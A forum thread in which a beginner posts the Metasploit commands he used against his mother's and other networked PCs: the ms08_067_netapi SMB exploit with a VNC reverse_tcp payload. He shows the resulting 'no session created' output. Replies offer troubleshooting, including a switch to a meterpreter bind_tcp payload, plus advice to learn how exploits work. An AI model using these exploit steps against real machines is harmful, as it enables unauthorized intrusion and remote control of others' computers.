Results 1 to 4 of 4

Thread: Metasloit, reverce TCP help needed

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009

    Question Metasloit, reverce TCP help needed

    First of all, you guy`s rock!
    There is so much information on this site to help you out, really cool!

    But now,

    I have BT4 on my VMware workstation, and finally figured out how to set a wireless connection without wireless assisten (wich didn`t work..).

    i did it with:
    iwconfig wlan0 essid ***** key *****
    dhclient wlan0

    and i was online, in my own network

    i have seen some 'youtube' vids about metasploit, and I don`t know much about that all jet, but idd like to give the framework3 a try...

    i typed:

    and the msf appeared in the console,

    show exploits

    use windows/smb/ms08_067_netapi
    show payloads
    set payload windows/vncinject/reverce_tcp
    set LHOST *MY_IP*
    set RHOST *MOM_IP*


    thats just what this guy in the video was doing.. but my console puts out this:
    [*] Handler binding to LHOST[*] Started reverse handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang Dutch[*] Exploit completed, but no session was created.

    how come no session was created?
    in the movie i saw this guy monitoring another pc.

    i scanned my network with nmap -O
    i found this ip with port 445 open.. so i used that ip (my moms)..

    any one who can teach me something about this all and show me why this just wont work?

    i tried several other ip`s, but every time it shows the same line in the end, no session created

    (as you may have noticed, i am from Holland, so sorry for any wrong words etc.)


  2. #2
    Join Date
    Jan 2010
    The new forums


    Computer might be patched or firewall is turned on.

    This is worth checking out for that particular exploit:

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010


    Quote Originally Posted by Neosterrr View Post
    [*] Handler binding to LHOST[*] Started reverse handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang Dutch
    Check the module info to see if the lang pack is supported.
    If I remember correctly some languages were not supported with the module.
    If that matches up then try
    set PAYLOAD windows/meterpreter/bind_tcp
    and see what happens.
    To be successful here you should read all of the following.
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Moderator KMDave's Avatar
    Join Date
    Jan 2010


    My advice is to learn how exploits work, how to check them, how try them out manually. That will help you to understand what's going on within metasploit. It will also help you to understand on how to analyze why something is not working in metasploit like in your case.
    If you are just using metasploit because you heard of it and see it as a tool to help you "pwning" a machine without any further knowledge you are in the wrong place here.
    Tiocfaidh ár lá

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts